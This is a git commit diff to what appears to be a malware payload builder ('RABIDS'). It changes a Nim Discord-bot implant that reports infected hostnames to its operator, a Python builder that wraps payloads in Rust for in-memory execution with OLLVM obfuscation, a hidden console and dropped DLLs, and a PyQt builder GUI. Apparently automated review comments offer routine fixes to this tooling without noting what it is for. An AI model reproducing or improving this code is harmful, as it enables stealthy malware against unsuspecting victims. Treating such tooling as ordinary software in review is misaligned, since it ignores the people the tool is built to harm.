Fixed DLL issue

Sarwar 🧃
2025-09-07 19:33:54 +05:00
parent 812fa55c8d
commit a63c71f49b
4 changed files with 178 additions and 84 deletions

BIN
DLL/pcre64.dll Normal file

Binary file not shown.


@ -3,10 +3,6 @@ import dimscord, asyncdispatch, times, options, httpclient, osproc, os, strutils
const
discordToken = ""
creatorId = ""
cyrptoDllData = staticRead("../DLL/libcrypto-1_1-x64.dll")
sslDllData = staticRead("../DLL/libssl-1_1-x64.dll")
cyrptoDllName = "libcrypto-1_1-x64.dll"
sslDllName = "libssl-1_1-x64.dll"
let discord = newDiscordClient(discordToken)
var
@ -212,13 +208,6 @@ proc getHostname(): string =
var machineName = getEnv("MACHINE_NAME", getHostname())
proc onReady(s: Shard, r: Ready) {.event(discord).} =
when defined(windows):
if not fileExists(cyrptoDllName):
writeFile(cyrptoDllName, cyrptoDllData)
if not fileExists(sslDllName):
writeFile(sslDllName, sslDllData)
let dm = await discord.api.createUserDm(creatorId)
if machineName notin sessionRegistry:
sessionRegistry.add(machineName)


@ -5,10 +5,11 @@ import sys
import os
import shutil
import re
import shlex
import shlex
import subprocess
import tempfile
def compile_nim(nim_file, output_exe, os_name, arch):
import base64
def compile_nim(nim_file, output_exe, os_name, arch, hide_console=False):
output_exe = Path(output_exe).resolve()
print(f"[*] Compiling Nim -> {os_name}:{arch}")
@ -24,6 +25,8 @@ def compile_nim(nim_file, output_exe, os_name, arch):
else:
nim_cmd.append("--os:windows")
nim_cmd.append(f"--cpu:{arch}")
if hide_console:
nim_cmd.append("--app:gui")
elif os_name == "linux":
nim_cmd.append("--os:linux")
@ -126,9 +129,8 @@ def merge_nim_modules(nim_files, out_dir: Path, options=None):
sys.exit(1)
print(f"[*] Merging modules: {nim_files}")
loot_dir = out_dir
loot_dir.mkdir(parents=True, exist_ok=True)
out_path = loot_dir / "combined.nim"
out_dir.mkdir(parents=True, exist_ok=True)
out_path = out_dir / "combined.nim"
merged_imports = set()
merged_code = []
@ -191,22 +193,28 @@ def merge_nim_modules(nim_files, out_dir: Path, options=None):
continue
final_code.append(merged_code[i])
with open(out_path, "w", encoding="utf-8") as fh:
fh.write("\n".join(sorted(merged_imports)))
fh.write("\n\n")
fh.write("\n".join(final_code))
fh.write("\n\n")
fh.write("proc main() =\n")
for main_content in main_contents:
if not main_content:
continue
fh.write(" block:\n")
for line in main_content:
fh.write(" " + line + "\n")
fh.write("\n")
fh.write("when isMainModule:\n")
fh.write(" main()\n")
final_content_parts = []
final_content_parts.append("\n".join(sorted(merged_imports)))
final_content_parts.append("\n\n")
final_content_parts.append("\n".join(final_code))
final_content_parts.append("\n\n")
final_content_parts.append("proc main() =\n")
for main_content in main_contents:
if not main_content:
continue
final_content_parts.append(" block:\n")
for line in main_content:
final_content_parts.append(" " + line + "\n")
final_content_parts.append("\n")
final_content_parts.append("when isMainModule:\n")
final_content_parts.append(" main()\n")
final_content = "".join(final_content_parts)
with open(out_path, "w", encoding="utf-8") as fh:
fh.write(final_content)
# print("[*] --- Begin Combined Nim Code ---\n" + final_content + "\n[*] --- End Combined Nim Code ---")
print(f"[+] Wrote merged Nim file: {out_path}")
return out_path
@ -229,7 +237,7 @@ def parse_target(target_str):
sys.exit(1)
def generate_rust_wrapper(nim_exe, final_exe, target_os, target_arch, embed_exe=None, obfuscate=False, ollvm=None):
def generate_rust_wrapper(nim_exe, final_exe, target_os, target_arch, embed_exe=None, obfuscate=False, ollvm=None, hide_console=False, embedded_dlls=None):
"""Generate a Rust wrapper for the Nim executable using in-memory execution."""
final_exe_path = Path(final_exe)
package_name = final_exe_path.stem
@ -260,14 +268,40 @@ def generate_rust_wrapper(nim_exe, final_exe, target_os, target_arch, embed_exe=
}
"""
windows_subsystem_attr = ""
if target_os == "windows" and hide_console:
windows_subsystem_attr = '#![windows_subsystem = "windows"]'
dll_declarations = ""
dll_drop_code = ""
if embedded_dlls:
dll_declarations_parts = []
dll_drop_code_parts = [" // Drop required DLLs to the current directory"]
for i, (dll_name, dll_bytes) in enumerate(embedded_dlls.items()):
dll_bytes_array = ','.join(str(b) for b in dll_bytes)
dll_declarations_parts.append(f'const DLL_{i}_NAME: &str = "{dll_name}";')
dll_declarations_parts.append(f'const DLL_{i}_DATA: &[u8] = &[{dll_bytes_array}];')
dll_drop_code_parts.append(f' std::fs::write(DLL_{i}_NAME, DLL_{i}_DATA).expect("Failed to write {dll_name}");')
dll_declarations = "\n".join(dll_declarations_parts)
dll_drop_code = "\n".join(dll_drop_code_parts)
rust_code = f'''
{windows_subsystem_attr}
use memexec;
use std::fs;
{embed_decl}
{dll_declarations}
const NIM_PAYLOAD: &[u8] = &[{nim_payload_array}];
fn main() {{
{embed_code}
{dll_drop_code}
unsafe {{
memexec::memexec_exe(NIM_PAYLOAD).expect("Failed to execute Nim payload from memory");
}}
@ -361,6 +395,7 @@ def main():
parser.add_argument("--nim-only", action="store_true", help="Only build Nim exe (no Rust)")
parser.add_argument("--obfuscate", action="store_true", help="Enable Rust OLLVM obfuscation")
parser.add_argument("--ollvm", nargs="*", help="OLLVM passes: bcfobf subobf constenc ...")
parser.add_argument("--hide-console", action="store_true", help="Hide console window on Windows")
parser.add_argument("--target", type=str, default="windows:amd64", help="Target triple (os:arch)")
parser.add_argument("--option", action="append", help="Option to inject as const (e.g., key=value)")
@ -375,6 +410,36 @@ def main():
target_os, target_arch = parse_target(args.target)
script_dir = Path(__file__).parent.resolve()
dll_source_dir = script_dir / 'DLL'
MODULE_DLLS = {
'MODULE/ctrlvamp.nim': {'pcre64DllData_b64': 'pcre64.dll'},
'MODULE/ghostintheshell.nim': {
'cryptoDllData_b64': 'libcrypto-1_1-x64.dll',
'sslDllData_b64': 'libssl-1_1-x64.dll'
}
}
selected_module_paths = args.merge if args.merge else [args.nim_file]
embedded_dlls_for_rust = {}
nim_options = list(args.option) if args.option else []
for module_path in selected_module_paths:
normalized_path = str(Path(module_path)).replace(os.sep, '/')
if normalized_path in MODULE_DLLS:
for const_name, dll_name in MODULE_DLLS[normalized_path].items():
dll_path = dll_source_dir / dll_name
if dll_path.exists():
dll_content = dll_path.read_bytes()
if not args.nim_only and target_os == 'windows':
print(f"[*] Queuing {dll_name} for Rust wrapper embedding.")
embedded_dlls_for_rust[dll_name] = dll_content
else:
print(f"[*] Embedding {dll_name} as base64 for {Path(module_path).name}")
b64_content = base64.b64encode(dll_content).decode('utf-8')
nim_options.append(f"{const_name}={b64_content}")
final_exe_path_str = args.output_exe
if target_os == "windows" and not final_exe_path_str.lower().endswith(".exe"):
final_exe_path_str += ".exe"
@ -386,15 +451,15 @@ def main():
with tempfile.TemporaryDirectory() as tmpdir:
tmp_dir = Path(tmpdir)
if args.merge:
loot_dir = final_exe.parent
launcher_source = merge_nim_modules(args.merge, loot_dir, options=args.option)
launcher_source = merge_nim_modules(args.merge, tmp_dir, options=nim_options)
else:
launcher_source = Path(args.nim_file)
patch_nim_file(launcher_source, args.option)
patch_nim_file(launcher_source, nim_options)
suffix = ".exe" if target_os == "windows" else ""
nim_exe_tmp = tmp_dir / f"{final_exe.stem}_nim_payload{suffix}"
compile_nim(launcher_source, nim_exe_tmp, target_os, target_arch)
should_hide_nim_console = args.hide_console and target_os == "windows"
compile_nim(launcher_source, nim_exe_tmp, target_os, target_arch, hide_console=should_hide_nim_console)
if not args.nim_only and target_os == 'windows':
print("[*] Generating Rust wrapper to embed Nim payload.")
@ -404,7 +469,9 @@ def main():
target_os, target_arch,
embed_exe=args.embed,
obfuscate=args.obfuscate,
ollvm=args.ollvm
ollvm=args.ollvm,
hide_console=args.hide_console,
embedded_dlls=embedded_dlls_for_rust
)
else:
if not args.nim_only and target_os != 'windows':
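Review bot: The docstring of `generate_rust_wrapper` still reads "using in-memory execution", but when `embedded_dlls` is set the generated `main` now writes each DLL to the process's current directory via `std::fs::write(DLL_{i}_NAME, DLL_{i}_DATA)` before `memexec_exe` runs, so the wrapper leaves files on disk and overwrites any same-named file already there. Extend the docstring to describe `hide_console` and `embedded_dlls` and to state that side effect, e.g. `"""Generate a Rust wrapper that writes any embedded_dlls into the working directory, then runs the Nim executable from memory."""`. The DLL bytes are read from `script_dir / 'DLL'` in `main()` and embedded without any checksum comparison, and this commit adds `DLL/pcre64.dll` as an opaque binary; a comment next to `MODULE_DLLS` recording each file's origin and expected hash would make that auditable. Both `generate_rust_wrapper` and `main()` continue outside the visible hunks.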

132
main.py

@ -1,5 +1,6 @@
import sys
import os
from functools import partial
import shlex
import subprocess
from pathlib import Path
@ -7,7 +8,7 @@ import tempfile
from PyQt5.QtWidgets import (
QApplication, QMainWindow, QWidget, QVBoxLayout, QHBoxLayout,
QPushButton, QLineEdit, QComboBox, QCheckBox, QTextEdit, QLabel, QGroupBox,
QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView, QFileDialog, QListWidget, QScrollArea,
QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView, QFileDialog, QListWidget, QScrollArea, QAbstractItemView,
QListWidgetItem, QSizePolicy
)
from PyQt5.QtGui import QFont, QPixmap, QMovie
@ -107,6 +108,38 @@ class BuildThread(QThread):
self.finished_signal.emit(-1)
class ModuleTableWidget(QTableWidget):
"""A QTableWidget that supports drag-and-drop row reordering."""
reorder_signal = pyqtSignal(list)
def __init__(self, parent=None):
super().__init__(parent)
self.setDragDropMode(QAbstractItemView.InternalMove)
self.setSelectionBehavior(QAbstractItemView.SelectRows)
self.setSelectionMode(QAbstractItemView.SingleSelection)
def dropEvent(self, event):
if event.source() == self and (event.dropAction() == Qt.MoveAction or self.dragDropMode() == QAbstractItemView.InternalMove):
source_row = self.selectionModel().currentIndex().row()
dest_row = self.indexAt(event.pos()).row()
if dest_row == -1:
dest_row = self.rowCount() -1
current_order = []
for row in range(self.rowCount()):
item = self.item(row, 0)
if item and item.data(Qt.UserRole):
current_order.append(item.data(Qt.UserRole))
moved_item = current_order.pop(source_row)
current_order.insert(dest_row, moved_item)
self.reorder_signal.emit(current_order)
event.accept()
event.setDropAction(Qt.IgnoreAction)
else:
super().dropEvent(event)
class RABIDSGUI(QMainWindow):
def __init__(self):
super().__init__()
@ -212,14 +245,18 @@ class RABIDSGUI(QMainWindow):
left_layout.addWidget(self.module_options_group, stretch=7)
options_row1 = QHBoxLayout()
self.hide_console_check = QCheckBox("HIDE CONSOLE")
self.hide_console_check.setFont(subtitle_font)
self.hide_console_check.setChecked(True)
self.obfuscate_check = QCheckBox("OBFUSCATE")
self.obfuscate_check.setFont(subtitle_font)
self.obfuscate_check.setChecked(False)
self.obfuscate_check.stateChanged.connect(self.toggle_obfuscation)
self.ollvm_input = QLineEdit("")
self.ollvm_input.setFont(subtitle_font)
options_row1.addWidget(self.hide_console_check)
options_row1.addWidget(self.obfuscate_check)
options_row1.addWidget(self.ollvm_input)
options_row1.addWidget(self.ollvm_input, 1)
left_layout.addLayout(options_row1)
options_row2 = QHBoxLayout()
@ -235,7 +272,7 @@ class RABIDSGUI(QMainWindow):
self.target_os_combo = QComboBox()
self.target_os_combo.addItems(["windows", "linux", "macos"])
self.target_os_combo.setFont(subtitle_font)
self.target_os_combo.currentTextChanged.connect(self.update_obfuscation_for_os)
self.target_os_combo.currentTextChanged.connect(self.update_windows_only_options)
options_row2.addWidget(target_os_label)
options_row2.addWidget(self.target_os_combo, 1)
@ -286,11 +323,17 @@ class RABIDSGUI(QMainWindow):
self.module_combo.currentTextChanged.connect(self.update_module_description)
self.module_combo.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Fixed)
module_select_layout.addWidget(self.module_combo)
module_buttons_layout = QHBoxLayout()
self.add_module_btn = QPushButton("ADD MODULE")
self.add_module_btn.setFont(subtitle_font)
self.add_module_btn.clicked.connect(self.add_module)
self.add_module_btn.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Fixed)
module_select_layout.addWidget(self.add_module_btn)
module_buttons_layout.addWidget(self.add_module_btn)
self.show_all_options_btn = QPushButton("SHOW ALL OPTIONS")
self.show_all_options_btn.setFont(subtitle_font)
self.show_all_options_btn.clicked.connect(self.show_all_options)
module_buttons_layout.addWidget(self.show_all_options_btn)
module_select_layout.addLayout(module_buttons_layout)
right_layout.addLayout(module_select_layout)
self.module_desc_label = QLabel("Select a module to view its description")
self.module_desc_label.setFont(subtitle_font)
@ -303,17 +346,16 @@ class RABIDSGUI(QMainWindow):
module_chain_label = QLabel("MODULE CHAIN")
module_chain_label.setFont(title_font)
right_layout.addWidget(module_chain_label)
self.module_table = QTableWidget()
self.module_table = ModuleTableWidget()
self.module_table.setFont(subtitle_font)
self.module_table.setColumnCount(4)
self.module_table.setHorizontalHeaderLabels(["Module", "", "", ""])
self.module_table.setColumnCount(2)
self.module_table.setHorizontalHeaderLabels(["Module", ""])
self.module_table.horizontalHeader().setSectionResizeMode(0, QHeaderView.Stretch)
self.module_table.setColumnWidth(1, 50)
self.module_table.setColumnWidth(2, 50)
self.module_table.setColumnWidth(3, 50)
self.module_table.setStyleSheet("background-color: #111113;")
self.module_table.cellClicked.connect(self.on_module_clicked)
self.module_table.reorder_signal.connect(self.reorder_modules)
right_layout.addWidget(self.module_table)
self.module_table.itemClicked.connect(self.on_module_item_clicked)
builder_layout.addLayout(right_layout, 4)
@ -569,9 +611,9 @@ class RABIDSGUI(QMainWindow):
self.tab_widget.addTab(docs_widget, "DOCUMENTATION")
self.update_loot_folder_view()
self.update_module_description("SELECT MODULE")
self.update_module_table()
self.update_module_table()
self.update_options_layout()
self.update_obfuscation_for_os(self.target_os_combo.currentText())
self.update_windows_only_options(self.target_os_combo.currentText())
def on_tab_changed(self, index):
if self.tab_widget.tabText(index) == "OUTPUT":
@ -723,55 +765,45 @@ class RABIDSGUI(QMainWindow):
self.update_module_table()
self.update_options_layout()
def remove_module(self, row):
if 0 <= row < len(self.selected_modules):
module_name = os.path.basename(self.selected_modules[row])
self.selected_modules.pop(row)
self.log_message(f"Removed module: {module_name}", "success")
def remove_module(self, module_to_remove):
"""Removes a module from the selected_modules list by its full path."""
if module_to_remove in self.selected_modules:
self.selected_modules.remove(module_to_remove)
module_name = os.path.basename(module_to_remove)
self.log_message(f"Removed module: {module_name}", "system")
self.update_module_table()
self.update_options_layout()
def on_module_clicked(self, row, column):
if 0 <= row < len(self.selected_modules):
self.update_options_layout()
def show_all_options(self):
"""Updates the options view to show options for all selected modules."""
self.update_options_layout()
def move_module_up(self, row):
if row > 0:
self.selected_modules[row], self.selected_modules[row - 1] = self.selected_modules[row - 1], self.selected_modules[row]
self.update_module_table()
self.update_options_layout()
def move_module_down(self, row):
if row < len(self.selected_modules) - 1:
self.selected_modules[row], self.selected_modules[row + 1] = self.selected_modules[row + 1], self.selected_modules[row]
self.update_module_table()
self.update_options_layout()
def on_module_item_clicked(self, item):
"""When a module in the chain is clicked, show its specific options."""
self.update_options_layout(focused_module=item.data(Qt.UserRole))
def reorder_modules(self, new_order):
# This check prevents re-updating if the order hasn't actually changed.
if self.selected_modules == new_order:
return
self.log_message("Module chain reordered.", "system")
self.selected_modules = new_order
self.update_module_table() # Re-draw to fix button connections
def update_module_table(self):
self.module_table.setRowCount(len(self.selected_modules))
for i, module in enumerate(self.selected_modules):
module_name = module.split('/')[-1]
name_item = QTableWidgetItem(module_name)
name_item.setFont(QFont("Arial", 10))
name_item.setData(Qt.UserRole, module) # Store full module path
name_item.setTextAlignment(Qt.AlignLeft | Qt.AlignVCenter)
self.module_table.setItem(i, 0, name_item)
up_btn = QPushButton("")
up_btn.setFont(QFont("Arial", 8))
up_btn.clicked.connect(lambda _, r=i: self.move_module_up(r))
up_btn.setEnabled(i > 0)
self.module_table.setCellWidget(i, 1, up_btn)
down_btn = QPushButton("")
down_btn.setFont(QFont("Arial", 8))
down_btn.clicked.connect(lambda _, r=i: self.move_module_down(r))
down_btn.setEnabled(i < len(self.selected_modules) - 1)
self.module_table.setCellWidget(i, 2, down_btn)
remove_btn = QPushButton("X")
remove_btn.setFont(QFont("Arial", 8))
remove_btn.clicked.connect(lambda _, r=i: self.remove_module(r))
self.module_table.setCellWidget(i, 3, remove_btn)
remove_btn.clicked.connect(partial(self.remove_module, module))
self.module_table.setCellWidget(i, 1, remove_btn)
for i in range(self.module_table.rowCount()):
self.module_table.setRowHeight(i, 30)
@ -779,15 +811,18 @@ class RABIDSGUI(QMainWindow):
def toggle_obfuscation(self):
self.ollvm_input.setEnabled(self.obfuscate_check.isChecked())
def update_obfuscation_for_os(self, os_name):
def update_windows_only_options(self, os_name):
if os_name in ("linux", "macos"):
self.hide_console_check.setEnabled(False)
self.obfuscate_check.setEnabled(False)
self.obfuscate_check.setChecked(False)
self.ollvm_input.setEnabled(False)
else:
self.hide_console_check.setEnabled(True)
self.obfuscate_check.setEnabled(True)
self.toggle_obfuscation()
def show_loading_view(self):
for i in reversed(range(self.options_layout.count())):
layout_item = self.options_layout.itemAt(i)
@ -932,6 +967,9 @@ class RABIDSGUI(QMainWindow):
if self.ollvm_input.text():
cmd.extend(["--ollvm"] + self.ollvm_input.text().split())
if self.hide_console_check.isChecked() and self.target_os_combo.currentText() == "windows":
cmd.append("--hide-console")
cmd.extend(options)
self.module_options_group.setTitle("BUILDING PAYLOAD...")
self.show_loading_view()
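Review bot: `ModuleTableWidget.dropEvent` uses `source_row` from `selectionModel().currentIndex().row()` unchecked in `current_order.pop(source_row)`: with no current index the value is -1 and the last module is moved instead of the dragged one. `current_order` also skips rows whose item lacks `Qt.UserRole` data, so it can be shorter than `rowCount()` and `pop` can raise `IndexError`. Add a guard before the pop, `if not 0 <= source_row < len(current_order): event.ignore(); return`, and give `dropEvent` a short docstring saying that it emits `reorder_signal` with the new path order instead of letting Qt move the row itself.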